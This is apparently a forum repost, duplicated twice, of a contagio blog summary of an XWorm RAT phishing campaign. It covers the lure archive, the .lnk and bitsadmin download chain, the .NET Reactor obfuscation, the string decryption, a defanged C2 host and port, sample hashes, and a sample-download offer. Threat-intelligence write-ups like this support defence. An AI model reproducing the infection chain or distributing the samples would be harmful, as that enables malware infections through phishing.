2024-09-12 0day in {REA_TEAM}: The X-Worm malware is being spread through a phishing email
by m4n0w4r
Phishing Tactics: An attacker sent an email with a shortened link that, when clicked, triggered the download of a file named Itinerary.doc_.zip.The downloaded .zip file contained a shortcut file (.lnk).This .lnk file was used to download and run a malicious batch script (output4.bat), which employed bitsadmin to download a harmful payload, disguised as svchost.com, into the %temp% folder.The svchost.com file was analyzed using tools like DiE and ExeInfo, revealing it to be part of the XWorm malware family, protected by .NET Reactor.The malware’s code was heavily obfuscated but was partially deobfuscated using the NETReactorSlayer tool.MD5 hashing, AES encryption in ECB mode, and Base64 decoding to decrypt strings.The malware’s configuration included a host (cyberdon1[.]duckdns[.]org), port (1500), and other parameters like a Telegram token and chat ID.XWorm Version: The analyzed version of XWorm was 5.6.
Article Link: contagio: 2024-09-19 X-WORM RAT (Phishing) Samples
1 post – 1 participant
2024-09-12 0day in {REA_TEAM}: The X-Worm malware is being spread through a phishing emailby m4n0w4rMore about X-Worm: Malpedia: X-Worm Malware with wide range of capabilities ranging from RAT to ransomware.Phishing Tactics: An attacker sent an email with a shortened link that, when clicked, triggered the download of a file named Itinerary.doc_.zip.The downloaded .zip file contained a shortcut file (.lnk).This .lnk file was used to download and run a malicious batch script (output4.bat), which employed bitsadmin to download a harmful payload, disguised as svchost.com, into the %temp% folder.The svchost.com file was analyzed using tools like DiE and ExeInfo, revealing it to be part of the XWorm malware family, protected by .NET Reactor.The malware’s code was heavily obfuscated but was partially deobfuscated using the NETReactorSlayer tool.MD5 hashing, AES encryption in ECB mode, and Base64 decoding to decrypt strings.The malware’s configuration included a host (cyberdon1[.]duckdns[.]org), port (1500), and other parameters like a Telegram token and chat ID.XWorm Version: The analyzed version of XWorm was 5.6.Download Download. Email me if you need the password scheme.File Information ├── 1893afc228afedb18b743176cbd3f0e4adb31fee7982252a4dc6180a6fb83451 ZBWWHQNZII.exe ├── ec7351c49098d55c332f9c5b0b4c51ffe804dd5780fc954006efcf2aeef91b7f HPFQJGRKIS.exe ├── ec7e0bf7036f03786789b6cb58d01c84733fc3a865974c79edf68cba25ff9891.Itinerary.doc.zip.exe └── ec7e0bf7036f03786789b6cb58d01c84733fc3a865974c79edf68cba25ff9891 ZBWWHQNZII.exe Malware Repo LinksOver the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.
Article Link: contagio: 2024-09-19 X-WORM RAT (Phishing) Samples
1 post – 1 participant
Read full topic